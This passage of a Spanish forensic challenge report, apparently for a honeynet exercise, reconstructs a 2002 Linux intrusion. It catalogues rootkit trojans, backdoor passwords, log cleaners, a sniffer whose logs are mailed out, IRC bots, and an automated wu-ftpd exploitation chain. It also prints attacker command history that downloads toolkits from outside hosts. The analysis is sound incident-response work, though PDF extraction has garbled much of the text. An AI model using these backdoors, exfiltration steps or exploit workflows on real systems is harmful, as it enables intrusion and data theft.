servidor web estndar. Este fichero est contaminado con el virus RST.b. La
ejecucin de este programa provoc que se infectaran tambin mltiples
programas del sistema bajo /usr/bin y la aparicin de los ficheros /dev/hdx1
y /dev/hdx2. En el apartado de referencias se ofrecen enlaces con
informacin completa sobre este virus.

En el apartado "Anlisis de artefactos" se ofrece informacin ms detallada
Informe tcnico Reto de Anlisis Forense

Pg. 17
Periodo
(Agosto
2002) Accin Evidencia Asociada
sobre ambos paquetes.

El archivo original conteniendo cada uno de los paquetes fue borrado por el
intruso tras su instalacin, pero fue posible recuperar para su anlisis el
paquete "manu.tgz", utilizando Autopsy.

NOTA: Con estos comandos finaliza el archivo /root/.bash_history, aunque su
fecha de ltima modificacin sugiere que fue alterado dos horas despus.
Este hecho se explica ms adelante.



Datos: La siguiente porcin de /root/.bash_history recoge esta actividad y
se corresponde perfectamente con lo que se puede observar en los
accesos a ficheros del timeline de Autopsy:

w
cd / var / t mp
mkdi r . ,
cd . ,
di r
wget www. geoci t i es. com/ adr i anboy20r o/ psy. t gz
t ar xvzf psy. t gz
cd psybnc/
pi co psybnc. conf
mv psybnc ht t pd
bash
cd . .
di r
r m- r f psy. t gz
wget www. mumut zz. go. r o/ manu. t gz
t ar xvzf manu. t gz
cd emech/
di r
pi co emech. user s
bash
cd . .
di r
r m- r f manu. t gz

Adems, estos comandos tambin se pueden observar en la
particin de swap del sistema analizado.


10:22:19
a
10:46:12
Actividad espordica de psybnc bajo /var/tmp/.,/.


Datos: Timeline de Autopsy

11:23:42
ltima modificacin del fichero /usr/local/games/tcp.log. Este fichero es el
fichero de log generado por una instancia de "linsniffer", un conocido sniffer
para linux.

Se puede concluir de su contenido que las siguientes mquinas tambin
fueron, al menos, escaneadas, y posiblemente atacadas y comprometidas
Informe tcnico Reto de Anlisis Forense

Pg. 18
Periodo
(Agosto
2002) Accin Evidencia Asociada
(desde las fuentes indicadas):

adsl - 209- 233- 126- 166. dsl . scr m01. pacbel l . net => 192. 168. 3. 8 [ 21]
pr oxyscan. under net . or g => r edhat 71 [ 23]
67. 96. 226. 249 => 192. 168. 3. 2 [ 21]
67. 96. 226. 249 => 192. 168. 192. 98 [ 21]
62. 194. 200. 212 => 192. 168. 192. 98 [ 21]




Datos: Incluidos en la descripcin.

12:33:15
a
15:36:30
El administrador entra en consola (tty1) como root.

Ejecuta el comando "ls" para mostrar la lista de ficheros de un directorio.
Dado que en ese momento el comando "/usr/bin/ls" ya est contaminado
por el virus RST.b, su ejecucin provoca que se vuelva a infectar de nuevo el
mismo conjunto de comandos bajo /usr/bin. Por ello cambia la fecha de
ltima modificacin de todos ellos.

Edita el fichero /.bash_history para eliminar sus propios comandos de l y
modifica su fecha de ltima modificacin dejndola a 3 minutos antes de su
entrada en el sistema.

A continuacin, lanza la copia binaria de todas las particiones a travs de la
red, hacia el servidor de FTP 192.168.3.14 utilizando ncftpput (ver Datos).

Dado que se lanz la copia "en vivo", las imgenes obtenidas son "fotos
movidas", con lo que es posible que se den ciertas discrepancias entre
distintas particiones o incluso dentro de una misma particin, ya que los
sistemas de ficheros son accedidos durante el proceso de copia. Esto no
tiene por qu constituir un problema. De hecho, no lo ha sido para realizar
esta reconstruccin de los hechos. Simplemente, es importante tener en
cuenta cmo se han obtenido las copias para poder conocer las
limitaciones de los datos que se podrn obtener de dichas copias. En este
caso, todas las modificaciones de ficheros acontecidas despus de las
12:33:15 son sospechosas de reflejar modificaciones parciales.

En este espacio de tiempo, slo aparecen en el timeline los accesos a
ficheros provocados por la ejecucin de los comandos del administrador, y
cierta actividad espordica de "psybnc" bajo /var/tmp., y de "emech". La
informacin sobre esta actividad se incluye en el apartado "Resumen de la
actividad IRC".


Datos: En la unidad 888 de la particin de swap, se puede encontrar el
siguiente comando compuesto, utilizado por el administrador para
obtener las imgenes de las distintas particiones del sistema
analizado:

Informe tcnico Reto de Anlisis Forense

Pg. 19
Periodo
(Agosto
2002) Accin Evidencia Asociada
f di sk - l / dev/ hda | gr ep " ^/ dev" | cut - d " / " - f 3 | awk ' {
pr i nt " cat / dev/ " $1" | ncf t pput - u pepel u - c - p x
192. 168. 3. 14 192. 168. 3. 10- " $1" . dd" ; }' | / bi n/ sh

En l se puede ver el usuario (pepelu) y la contrasea (x) que utiliz
para llevar por FTP las copias al servidor 192.168.3.14.

15:16:30

Ultimo acceso a fichero registrado.

Datos: En concreto, el ltimo acceso a fichero registrado fue un acceso de
lectura al fichero /etc/hosts. Del timeline de Autopsy:

Fr i Aug 23 2002 15: 36: 30 172 . a. - / - r w- r - - r - - r oot / ssh
r oot 28276 / et c/ host s




Informe tcnico Reto de Anlisis Forense

Pg. 20
5. Anlisis de artefactos
Se denomina artefacto a cada uno de los ficheros que quedan en el
sistema como consecuencia de una intrusin.
5.1. Ficheros bajo /var/ftp/nerod
El fichero /var/ftp/nerod/nerod.tgz constituye el primer fichero
descargado en esta intrusin. Consiste en un rootkit con diversas
utilidades. Estos son los ficheros encontrados:

Fichero MD5 / Descripcin
/var/ftp/nerod.tar.gz 23aa88d8dba7a2474bc6a4879c12156a

Se trata del primer paquete instalado en el ataque. Es un 'rootkit' que contiene
varias utilidades, como se describe a continuacin
/var/ftp/nerod/.1addr 6b7b4d6270255ba973f 9865020490423

Fichero que contiene las direcciones de IP a esconder, y que al instalarse el rootkit
fue copiado a /dev/ttyoa
/var/ftp/nerod/.1file 14aaf eab735548f 0d6c24cf b6e6803c0

Fichero que contiene los nombres de fichero a esconder, y que al instalarse el rootkit
fue copiado a /dev/ttyof
/var/ftp/nerod/.1logz 9da4ef c8df c18db52f 0f 39f dc1f 04f f 3

Fichero que contiene las cadenas a esconder, y que al instalarse el rootkit fue
copiado a /dev/ttyos
/var/ftp/nerod/.1proc 710657a7b9f 9f b864739f 57a71f 37ecc

Fichero que contiene los procesos a esconder, y que al instalarse el rootkit fue
copiado a /dev/ttyop
/var/ftp/nerod/atd.init 5e13cb6e8a752921bae378ea9ccbb2ec

Fichero de arranque del demonio 'atd', instalado en /etc/rc.d/init.d/atd, que
adems de arrancar del demonio de 'at' tal y como hace el fichero estndar, se
asegura de arrancar todos los troyanos instalados con unas lneas de "inet_start all"
camufladas por enmedio. Esta funcin 'inet_start' est definida en el fichero
'functions'.
/var/ftp/nerod/chsh 71dcb1516635e8910a37444ecd95992f

Troyano del comando /usr/bin/chsh, est adems protegido contra el anlisis, al
capturar las llamadas a 'ptrace'. Se trata de un 'backdoor' que da acceso al sistema
como 'root' al introducir como nueva shell la palabra clave "satori". Este binario es
alguna variante del incluido en el rootkit lrk4, ver
Uhttp://project.honeynet.org/papers/enemy3/README.txt.U
/var/ftp/nerod/clean f 9e2970e3a7682440316b6e1a2687cbe

Script para borrar todas las lneas conteniendo una cadena que se pase como
parmetro de todos los ficheros de log bajo /var/log, rearrancando el demonio
syslogd. En la instalacin del script, se copia a /usr/bin/clean.
Informe tcnico Reto de Anlisis Forense

Pg. 21
/var/ftp/nerod/core 7cb1b3b58c9a0f ba42155f ab58521d9c

Fichero 'core' generado por el comando "/ usr/bin/mc -P". A partir del nombre del
fichero y analizando las cadenas dentro de l, se trata del "Midnight Commander",
un "file manager" en modo texto bastante potente (ver Uhttp://www.ibiblio.org/mc/U).
Se trata de un 'core' que ya estaba en el paquete original 'nerod.tar.gz', por lo que
se gener en otro sistema, antes de crearse el mismo. As, podemos averiguar que el
core lo gener el usuario 'root' en un sistema Linux llamado "nfk" y desde el directorio
/mnt/c/hacking/lucrare/ptftp/kfn.
/var/ftp/nerod/crontab-
entry
5c525103dcef a78d55af b2e9a68e4907

Fichero de configuracin de cron, para enviar el primero de cada mes el fichero
resultado de sniffing (/usr/local/games/tcp.log) junto con la configuracin de red
del sistema a la direccin de correo suntsfant2@yahoo.com"
/var/ftp/nerod/du 12cc055bf 763b37f 9792b7bef 92cf 093

Troyano del comando /usr/bin/du, esconde de su salida los ficheros cuyos nombres
contengan lo indicado en el fichero de configuracin /dev/ttyof
/var/ftp/nerod/find eb1c26da59b892570f 4567469d49bd8c

Troyano del comando /usr/bin/find, esconde de su salida los ficheros cuyos nombres
contengan lo indicado en el fichero de configuracin /dev/ttyof
/var/ftp/nerod/functions 527bda3068675f 780f 66ecb909491c7a

Script que define la funcin 'inet_start' para arrancar los siguientes troyanos: sshd y el
sniffer bajo /usr/local/games/identd. Se copi al final del fichero
/etc/rc.d/init.d/functions estndar por el script de instalacin del rootkit. De esta
forma, y al ser tambin modificados /etc/rc.d/init.d/atd y /etc/rc.d/init.d/inet, se
asegura el arranque automtico de los mismos con el inicio del sistema.
/var/ftp/nerod/ifconfig 8455e6975ecccd09dc53f bb26768d19d

Troyano del comando /sbin/ifconfig, esconde de su salida el flag PROMISC,
permitiendo tener un interfaz de red en modo promiscuo (para sniffing) sin despertar
sospechas. Es un fichero distinto al encontrado bajo sshd/ifconfig, aunque con el
mismo propsito.
/var/ftp/nerod/imp da4171d1b46b7792b79a53f c87457f e4

Herramienta de denegacin de servicio (DoS) mediante la tcnica de 'SYN
flooding', bombardea a un sistema objetivo con un alto nmero de peticiones de
conexin, consiguiendo de forma efectiva su paralizacin. Instalada en
/usr/bin/imp. Conocida tambin como 'slice3' puede obtenerse en
Uhttp://packetstormsecurity.nl/DoS/indexdate.shtmlU
/var/ftp/nerod/inet ab0e77af c2091a2791ee91415a935f c4

Modificacin del fichero /etc/rc.d/init.d/inet de RedHat 6.0 para ejecutar "inet_start
all" y arrancar los troyanos (ver fichero functions). Puesto que en RedHat 7 se emplea
xinetd en lugar de inetd, este fichero no lleg a instalarse (ver script de instalacin).
/var/ftp/nerod/install 6d3bca60f 8064f f 015ecf 29b06eeddae

Script de instalacin del rootkit. Realiza las tareas de copiar los diferentes troyanos a
sus lugares adecuados en el sistema, chequear la existencia de otros rootkits, as
como recoger informacin del sistema y enviarla a direcciones de correo. No lleg
a ejecutarse completamente (ver Cronograma de actividades).
/var/ftp/nerod/install.log 9f b4f 7f 2e0c138839924381f d274e91b

Fichero de log de la instalacin del rootkit. Contiene numerosos errores (pues hay
ficheros no encontrados, as como prueba que no se ejecut completamente.
Informe tcnico Reto de Anlisis Forense

Pg. 22
/var/ftp/nerod/killall 1678eb0817a0775f dadd24119e28d810

Troyano del comando /usr/bin/killall, ignora los procesos indicados en el fichero de
configuracin /dev/ttyop
/var/ftp/nerod/linsniffer 10f 6663e2e867f 4d3f 628648d340e7be

Sniffer de red. Instalado en /usr/local/games/identd por el script de instalacin,
recoge el trfico de red y lo almacena en /usr/local/games/tcp.log
/var/ftp/nerod/login 9288dac26e0aae060bc2bb036020b451

Se trata de un 'backdoor' del comando login estndar que permite la entrada en el
sistema a cualquier cuenta mediante el password escondido "satori", sea cual sea el
password real del usuario. Adicionalmente, si el acceso de root est restringido a
otros terminales, emplear el usuario "rewt" da acceso como "root". Finalmente,
desactiva el 'history log' si se emplea el backdoor
/var/ftp/nerod/ls 9e7165f 965254830d0525f da3168f d7d

Troyano del comando /bin/ls, esconde de su salida los ficheros cuyos nombres
contengan lo indicado en el fichero de configuracin /dev/ttyof. Se trata del mismo
fichero analizado en el reto de honeynet #29 (ver por ejemplo,
Uhttp://www.honeynet.org/scans/scan29/sol/gmartin/filelist.htmlU)
/var/ftp/nerod/md5bd 93002f 144f de901260f 4b4ebdce57630

backdoor de red. Se trata de una shell conectada al puerto 465 (smtps) hacindose
pasar por un servidor Sendmail: aparece el banner tpico de:
220 - localhost.localdomain SMTPS Sendmail 8.11.0/8.11.0; <fecha>.
Cualquier comando que se le introduzca produce un simulacro de error:
500 5.5.1 Command unrecognized: "<comando>"
Unicamente al introducir una palabra cuyo checksum md5 de como resultado
"855f314a4a3eebb6e1f9c3dae3a8ae31" (generado con un simple echo -n |
/usr/bin/md5sum) se abre automticamente una shell, de la que se ha eliminado el
history log.
Este binario se copia a /usr/sbin/atd mediante el script de 'install'. Se trata del mismo
fichero descrito en Uhttp://www.blockout.info/BkdoorRkTroj/Fredriktxt1.txtU.
/var/ftp/nerod/me d0a432ea2e4e9b462d29796da8eb7bcb

Instalado en /bin/me por el script de instalacin del rootkit, es un script que
nicamente contiene:

#!/bin/sh
unset HISTFILE
unset TMOUT
echo " cd /usr/man/man1/psybnc"
echo " open Hftp.geocities.comH"

/var/ftp/nerod/netstat c0e8b6f f 00433730794eda274c56de3f

Troyano del comando /bin/netstat, esconde de su salida las direcciones IP o
nombres de dominio indicadas en el fichero de configuracin /dev/ttyoa. Se trata
del mismo fichero analizado en el reto de honeynet #29 (ver por ejemplo,
Uhttp://www.honeynet.org/scans/scan29/sol/gmartin/filelist.htmlU)
/var/ftp/nerod/ps a71c756f 78583895af e7e03336686f 8b

Troyano del comando /bin/ps, esconde de su salida los procesos indicados en el
fichero de configuracin /dev/ttyop
Informe tcnico Reto de Anlisis Forense

Pg. 23
/var/ftp/nerod/pstree 99f 22aeb2e2f 2086f a67f 939c0b164db

Troyano del comando /usr/bin/pstree, esconde de su salida los procesos indicados
en el fichero de configuracin /dev/ttyop
/var/ftp/nerod/sense 464dc23cac477c43418eb8d3ef 087065

Script de perl para analizar la salida del sniffer LinSniffer, el script de instalacin lo
copia a /usr/local/games/banner. Se trata del mismo fichero analizado en el reto de
honeynet #29 (ver por ejemplo,
Uhttp://www.honeynet.org/scans/scan29/sol/gmartin/filelist.htmlU)
/var/ftp/nerod/shad 55955848943cbe9a0bc0f e3d14cba972

Programa para arrancar otros binarios escondiendo su autntico nombre,
cambiando el argv[0]. Uso: shad <nombre_ficticio><comando a ejecutar>
<parametros>.
/var/ftp/nerod/sshd/ifconfi
g
086394958255553f 6f 38684dad97869e

Troyano del comando /sbin/ifconfig, esconde de su salida el flag PROMISC,
permitiendo tener un interfaz de red en modo promiscuo (para sniffing) sin despertar
sospechas. Una bsqueda del checksum en google confirma que se trata de un
fichero ampliamente conocido, perteneciente al rootkit 'lrk5'. Ver, por ejemplo,
Uhttp://www.linuxfocus.org/English/ November2002/ article263.shtmlU.
/var/ftp/nerod/sshd/init.ssh
d
b33deb29db1aed81866e048416b0bd68

Script de arranque del demonio sshd. El script 'sshd-install' lo copia a
/etc/rc.d/init.d/sshd.
/var/ftp/nerod/sshd/install.l
og
d41d8cd98f 00b204e9800998ecf 8427e

Fichero vaco.
/var/ftp/nerod/sshd/ssh_co
nfig
5f d2ce512e0eba4d090191e8a1518808

Fichero de configuracin del cliente ssh. No es instalado por el script de instalacin
en ningn sitio.
/var/ftp/nerod/sshd/ssh_ho
st_key
4ef f c0e40601df 5c7ac6617c4f 41eb51

Clave privada de ssh, la copia el script de instalacin a /etc y /etc/ssh. Interesante
la cadena root@xxxbuck.com.
/var/ftp/nerod/sshd/ssh_ho
st_key.pub
e7c0f 95946172c5092f 3e8e9538c3a01

Clave publica de ssh, la copia el script de instalacin a /etc y /etc/ssh. Interesante
la cadena Hroot@harospro.netH
/var/ftp/nerod/sshd/ssh_ra
ndom_seed
117d5a5ec19a5d0ac029f 2a07f c3b617

Fichero semilla para ssh, se copia a /etc/ssh y /etc
/var/ftp/nerod/sshd/sshd d17e923542b202746b9b3dad26ed25e7

Se trata de un troyano de sshd, con una puerta trasera que permite el acceso al
sistema con el password cuyo md5 sea "54818b05d116eadc7f67517a3a6e4b33", como
puede verse en el cdigo:
Informe tcnico Reto de Anlisis Forense

Pg. 24

/var/ftp/nerod/sshd/sshd_c
onfig
57d92002e68514d8998ee64198bbe975

Fichero de configuracin de sshd, lo copia el script 'sshd-install' a /etc/sshd_config y
/etc/ssh/sshd_config. Configura al demonio para escuchar en el puerto 1981, en
lugar del estndar 22.
/var/ftp/nerod/sshd/sshd-
install
a03539cf 459cd43f f 53754ceca78e0ef

Script de instalacin del troyano de sshd, copia el binario y los ficheros de
configuracin y claves a los directorios estndar de ssh.
/var/ftp/nerod/sysinfo b40f a196dad1170bb4c52a35a73e6457

Script para recolectar informacin del sistema: configuracin hardware y software,
ficheros mpeg y mp3 e informacin sobre tarjetas de crdito.
/var/ftp/nerod/syslogd 53f c8c03b327952f be891d4f 02a036b8

Syslogd troyano, no enva al log del sistema ninguna informacin con cadenas
encontradas en /dev/ttyos
/var/ftp/nerod/syslogd.init 29056af 3f f 697f 3cf 5de07ef 3bc46814

Script de arranque del demonio syslogd, se copia a /etc/rc.d/init.d/syslog.
/var/ftp/nerod/top 58a7e5abe4b01923c619aca3431e13a8

Troyano del comando /usr/bin/top, esconde de su salida los procesos indicados en
el fichero de configuracin /dev/ttyop
/var/ftp/nerod/vdir bf b9788eaa2010ebad96be6aead8a600

Troyano del comando /usr/bin/vdir, esconde de su salida los ficheros cuyos nombres
contengan lo indicado en el fichero de configuracin /dev/ttyof.
/var/ftp/nerod/wp c4774db51553f 61c8aef b1bcc123a81c

Programa para limpiar los ficheros de log wtmp,utmp y lastlog. Es el mismo referido
en Uhttp://www.blockout.info/BkdoorRkTroj/Fredriktxt1.txtU


Informe tcnico Reto de Anlisis Forense

Pg. 25
5.2. Ficheros bajo /root/.,
Bajo /root/., encontramos una serie de ficheros instalados por el intruso.
Se trata de dos paquetes: awu.tgz y psyBNC.tar.gz, descargados
mediante wget como demuestran las lneas del fichero
/root/.bash_history:
wget Hwww.geocities.com/master0n/awu.tgzH
wget www.geocities.com/gavish19/psyBNC.tar.gz
Los ficheros de dichos paquetes se agrupan bajo sendos subdirectorios:
o awu
o psybnc

Ficheros bajo aw

Fichero MD5 / Descripcin
/root/.,/awu.tgz 602141db068f c251a352f b474f f a5a74

Paquete que contiene los ficheros. Descargado de www.geocities.com/master0n
mediante wget (como puede verse en el fichero /root/.bash_history) el 23 de Agosto
a las 01:41:51 (de acuerdo con los tiempos de acceso de los ficheros). Un paquete
similar a este aparece referido en
Uhttp://www.giac.org/practical/J erry_Pierce_GCFA.docU y en el incidente de
Uhttp://serkoon.honeypots.net/smenutz.htmlU. Hay tambin informacin en
Uhttp://www.zone-h.org/en/forum/thread/forum=3/thread=18950/U
/root/.,/aw/12.216.pscan.21 d41d8cd98f 00b204e9800998ecf 8427e

Fichero vaco. Resultado de la bsqueda de sistemas con un servidor ftp en la
subred 12.216 mediante el programa 'pscan2'. Aparentemente se abort la
ejecucin de "awu 12.216" mediante Control-C (ver /root/.bash_history).
/root/.,/aw/auto ac45b33a1951a851142b2ec670e43664

Simple script para llamar a 'awu' probando una subred clase A entera:

echo "Enter A class range"
read brange
echo "Enter output file"
read file
crange=0
while [ $crange -lt 255 ] ; do
echo -n "./awu $brange.$crange ; " >>$file
let crange=crange+1
done





Informe tcnico Reto de Anlisis Forense

Pg. 26
/root/.,/aw/awu 0e5ca367e765319610f 71eabc3af dd08

Programa para, de forma automtica, entrar en los sistemas vulnerables al exploit
'wu' de una red clase B. El funcionamiento es el siguiente:
1- Con ayuda de 'pscan2', se detectan los sistemas con el puerto 21 (ftpd) activo.
2- Se eliminan sistemas duplicados empleando 'sort' y 'nodupe'
3- Se buscan aquellos servidores wu-ftp vulnerables, mediante 'ssvuln'.
4- Se intenta entrar en cada uno de ellos mediante 'oops' (que a su vez llama de
forma recursiva a 'ss') e instalar automticamente un rootkit.
5- La lista final generada contiene los sistemas listos para entrar con un backdoor ya
instalado.
/root/.,/aw/awu.list 5de1b020d2e7dd350b2104c54ab6899d

Contiene una lista de 6 direcciones IP y sus nombres asociados, resultado de la
ejecucin de 'ss', en los cuales se ejecut de forma satisfactoria el exploit 'wu' y se
instal automticamente un rootkit (5 de ellos en la red 62.X.X.X). La misma est ya
contenida en el fichero original awu.tgz, luego se gener en un sistema distinto
/root/.,/aw/awu.log 38191e26af e4084f f 8cde4b27c1f 0ca4

Fichero de log resultado de la ejecucin de awu, buscando sistemas vulnerables en
las subredes 128.123.X.X., y entrando de forma automtica en 6 de ellos.
/root/.,/aw/doit4me 92bad96c06ee8269423caf bf 4f b53f 04

Script muy parecido a 'auto' para escanear una subred clase A entera, slo que con
comentarios en rumano.
/root/.,/aw/Makefile 480432ec9b9e79d9f 1913ef a4187b2a9

Makefile para generar los binarios 'pscan2', 'oops', 'ss', 'nodupe' y 'ssvuln' a partir de
sus fuentes correspondientes. Es interesante que no existe fuente alguno para los
exploits 'wu' y 'x2'.
/root/.,/aw/nodupe f 79b61d2b4725c192883397580f 93f ad

Programa que ordena y elimina direcciones IP duplicadas de un fichero de entrada
(que se toma como primer parmetro) y lo escribe en un fichero de salida (que se
toma como segundo parmetro). Empleado por 'awu' despus de la fase de
deteccin de direcciones IP.
/root/.,/aw/nodupe.c 5b47796f 7f 96f b5aa2ab487900294404

Cdigo fuente en C del anterior programa
/root/.,/aw/nodupe.o 9f 7cb0c1a84e7cf 888f b5e6be379caf 0

Fichero objeto del anterior programa
/root/.,/aw/oops ce1ef a87422513db8599a0f 3d4939f 3b

Programa para llamar al exploit 'ss' de forma recursiva con todas las direcciones IP
contenidas en un fichero que se pasa como parmetro. Empleado por awu.
/root/.,/aw/oops.c e9c6ea1c70c86e206955b6143ac1d559

Cdigo fuente en C del anterior programa
/root/.,/aw/oops.o cb63a4e21e35566c744b418a15c91ea4

Fichero objeto del anterior programa
/root/.,/aw/outpu ca7ebe136969e0c8f f 334ed55259de90

Contiene una nica gran lnea con la llamada a 'awu' con las subredes de la 62.0 a
la 62.254. Aunque el nombre sugiere que es el resultado de alguna ejecucin,
puede perfectamente emplearse para lanzar dichos comandos.

Informe tcnico Reto de Anlisis Forense

Pg. 27
/root/.,/aw/pscan2 d8c9f ea1dbeb7b0e457c861b7a5b40bc

Programa para escanear subredes clase B en busca de sistemas con un
determinado puerto activo. La subred y puerto a escanear se introduce como
parmetro y el resultado se guarda en un fichero de nombre
<subred>.pscan.<puerto>. El scanning se realiza en paralelo hasta 650 sockets para
minimizar el tiempo de bsqueda.
/root/.,/aw/pscan2.c 9b2e77ee16f f 2c29e08cba331d74057c

Cdigo fuente en C del anterior programa
/root/.,/aw/ss 987f 5d76f 78d1e0a6f 9e504a0f 140eda

Programa para intentar entrar en un sistema, cuya direccin IP se pasa como
parmetro, mediante el exploit 'wu'. Ejecuta 'wu -t -d <ip_address>' y si entra en la
victima, le intenta instalar de forma automtica un rootkit, descargado de
http://diablows.org/gold.tgz mediante wget lynx. Si consigue de forma efectiva
instalar el backdoor correspondiente, guarda su direccin IP en el fichero awu.list
para su posterior revisin. El rootkit http://diablows.org/gold.tgz es referido en el
incidente Uhttp://www.incidents.org/detect/rating.htmlU y en
Uhttp://serkoon.honeypots.net/smenutz.htmlU, pero el fichero en cuestin ya no est
disponible en esa url.
/root/.,/aw/ss.c b91ca7103105f de7054f 3424e8d82d4b

Cdigo fuente en C del anterior programa
/root/.,/aw/ssvuln e9220bde5b4be41365f f 78e609d97446

Programa para buscar servidores wu-ftpd. Las direcciones a testear se indican en un
fichero que se pasa como parmetro y la lista de los encontrados se guarda en otro
fichero que se pasa como segundo parmetro. El programa paraleliza la bsqueda
creando tantos procesos hijo como se le indique en el tercer parmetro.
/root/.,/aw/ssvuln.c 071245a9bc3b47771c12278f 450114a0

Cdigo fuente en C del anterior programa
/root/.,/aw/targets 92ef c70ddbd865b388be9ea3f 0c39001

Contiene una lista de versiones de SSHD, presumiblemente las vulnerables al exploit
'x2'.
/root/.,/aw/test.c d41d8cd98f 00b204e9800998ecf 8427e

Fichero vaco. Su propsito es desconocido, puesto que no se usa en los otros
programas.
/root/.,/aw/test.f d8e8f ca2dc0f 896f d7cb4cb0031ba249

Fichero que nicamente contiene la palabra "test". Al igual que el anterior, su
propsito es desconocido.
/root/.,/aw/wu 33459cdd140ac993a326a8f 4b76f 19c5

Exploit hecho por TESO (http://teso.scene.at) para la vulnerabilidad de globbing de
mltiples versiones de wu-ftpd, incluyendo 2.6.1-16.
El exploit, tanto una versin compilada como su cdigo fuente, estn disponibles en
las siguientes direcciones:

Uhttp:/ / packetstormsecurity.nl/ removed/7350wurm.desc
Uhttp://packetstormsecurity.nl/removed/7350wurm
Uhttp:/ / packetstormsecurity.nl/ 0205-exploits/ 7350wurm.cU

Esta es su descripcin original: "This is a TESO exploit for the double free() bug that
Informe tcnico Reto de Anlisis Forense

Pg. 28
exists in multiple wu-ftpd servers. The exploit can target many different Linux/x86
configurations and is distributed in binary form. Targets wu-2.4.2-academ[BETA-
18](1), wu-2.6.0(1), wu-2.4.2, wu-2.6.1-18, wu-2.6.1-16, and more."
El checksum del fichero coincide con el binario disponible en
http://packetstormsecurity.nl.
La vulnerabilidad que aprovecha est descrita en los siguientes boletines de
seguridad:
Uhttp://www.cert.org/advisories/CA-2001-33.html
Uhttp://www.kb.cert.org/vuls/id/886083
Uhttp://www.kb.cert.org/vuls/id/AAMN-54WPCS
Uhttp://rhn.redhat.com/errata/RHSA-2001-157.html
Uhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0550U


/root/.,/aw/x2 1309689a9af 6b82e11e8df a5c6282c30
/root/.,/aw/x2
Se trata de un "exploit" para atacar los puertos de sshd, empleando la
vulnerabilidad descrita en el aviso "SSH1 CRC-32 compensation attack detector
vulnerability" (Uhttp://www.securityfocus.com/advisories/3088U). Tanto la salida del
comando 'strings' como el checksum md5 coinciden con un binario conocido. Un
anlisis profundo del exploit puede encontrarse en
HUhttp://staff.washington.edu/dittrich/misc/ssh-analysis.txtUH

En resumen, nos encontramos ante un scanner que automatiza la
intrusin en sistemas con wu-ftpd vulnerable. Este sera el esquema de
trabajo de awu:



awu
pscan2
nodupe
ssvuln
ss
oops
Servidor 1
Servidor 2
Servidor 3
IP address
1.- Deteccin de
servidores ftp
2.- Eliminacin de
servidores duplicados
3.- Seleccin de
servidores wu-ftpd
wu exploit
gold.tgz rootkit
4.- Entrada al sistema
e instalacin de
backdoor
5.- Generada lista final
con los sistemas
comprometidos y el
backdoor instalado y
verificado.
Fichero incluido en awu.tgz
Descargado
automticamente de
http://www.diablows.org
Informe tcnico Reto de Anlisis Forense

Pg. 29

Ficheros bajo psybnc
El directorio /root/.,/psybnc contiene la versin 2.2.1 del conocido proxy
de IRC psybnc, descargado mediante wget desde
www.geocities.com/gavish19. psybnc permite mantener conexiones IRC
de forma annima, entre otras funcionalidades (ver, por ejemplo,
HUhttp://www.jestrix.net/tuts/psy.htmlUH
HUhttp://www.netknowledgebase.com/tutorials/psybnc.htmlUH ).
Se trata del primer proxy de IRC configurado en el sistema. A partir de los
ficheros de configuracin y ficheros de log, es posible conocer a qu
servidores, qu canales y con que nicks se conect el usuario. Puesto
que en el anlisis hemos encontrado ms de un proxy de IRC, hemos
credo interesante analizar todos ellos de forma conjunta en el apartado
5.5 Resumen de la actividad IRC.

Informe tcnico Reto de Anlisis Forense

Pg. 30
5.3. Ficheros bajo /var/tmp/.,
Una ltima fase de creacin de ficheros consisti en crear el directorio
/var/tmp/., y descargar sobre l los paquetes manu.tgz y psy.tgz,
nuevamente obtenidos mediante wget:
wget Hwww.geocities.com/adrianboy20ro/psy.tgzH
wget www.mumutzz.go.ro/manu.tgz
En ambos casos, tras instalar el paquete correspondiente, borra los
ficheros con rm. No obstante, en el caso de manu.tgz puede
recuperarse del disco mediante autopsy.
/var/tmp/.,/psybnc/ contiene los ficheros de otra instancia del proxy IRC
psybnc, esta vez en la versin 2.2.2beta. En este caso, el atacante ha
renombrado el binario a httpd para intentar disimular su presencia. La
informacin obtenida del anlisis de estos ficheros puede verse en el
apartado 5.5 Resumen de la actividad IRC.
/var/tmp/.,/emech contiene los ficheros del IRC bot emech.

Fichero MD5 / Descripcin
/var/tmp/.,/emech/emech.users 44ee32a46470033ecf 9adbe06b885d65

Fichero de configuracin de usuarios de emech. Contiene Adrian y
George
/var/tmp/.,/emech/emech.users.save 68b329da9893e34099c7d8ad5cb9c940

Fichero de configuracin de usuarios que estaba originalmente en el
paquete manu.tgz, no contiene ningn usuario.
/var/tmp/.,/emech/httpd 9e56400ac68ab3278460bed8df c91e3f

emech IRC bot. (ver Uhttp://www.energymech.net/U) Es el binario de
'emech', si bien el atacante lo ha cambiado de nombre para intentar
pasar desapercibido con el nombre de un servidor web estndar. Se
trata adems del fichero contaminado con el virus RST.b cuya
ejecucin provoc la aparicin de los ficheros /dev/hdx1 y /dev/hdx2
y la contaminacin de otros ficheros en /bin. Una buena descripcin
del virus est disponible en
Uhttp://UHUwww.virusbtn.com/magazine/archives/pdf/2002/200202.PDFUH
/var/tmp/.,/emech/LinkEvents 9869c9eb2868bf 53b21738492160d0af

Registra el arranque de emech el 23 Ago a las 10:20:29:
1030090829 EnergyMech started...
/var/tmp/.,/emech/mech.levels e75d953b41779538cb4e148dc6934c44
/var/tmp/.,/emech/mech.session 44b868f a12a80f 674905a1f af 5b7052b
/var/tmp/.,/emech/mech.set 2821f b2c4613886826d5d60b796e2de8

Ficheros de configuracin de emech. La informacin obtenida del
anlisis de estos ficheros puede verse en el apartado 5.5 Resumen de
la actividad IRC.
/var/tmp/.,/emech/mech.pid 013c04f 8e2ec5ea4316d0cf 85d8dc52a

Fichero que contiene el PID del proceso emech (7989)
Informe tcnico Reto de Anlisis Forense

Pg. 31

5.4. Ficheros bajo /bin, /usr/bin y otros
directorios del sistema

Como consecuencia de la instalacin del rootkit bajo /var/ftp/nerod,
diversos comandos y ficheros de configuracin del sistema fueron
alterados. Adicionalmente, la ejecucin del fichero
/var/tmp/.,/emech/httpd, infectado con el virus RST.b (ver [12]) ,
provoc la infeccin de toda una serie de binarios bajo /bin. Finalmente,
algunos otros ficheros modificados por la ejecucin de alguna accin
especfica durante el ataque son tambin descritos aqu.


Fichero MD5 / Descripcin
/bin/chgrp f cd4b5b713a65f 0a0f acf f 1f ec9f 7adb

binario original, infectado por el RST.b virus
/bin/chmod 091d7e041cd159af 58cf 2ae7c2308ecf

binario original, infectado por el RST.b virus
/bin/chown c9432d8f 9f 47d0c2b5077899a9959195

binario original, infectado por el RST.b virus
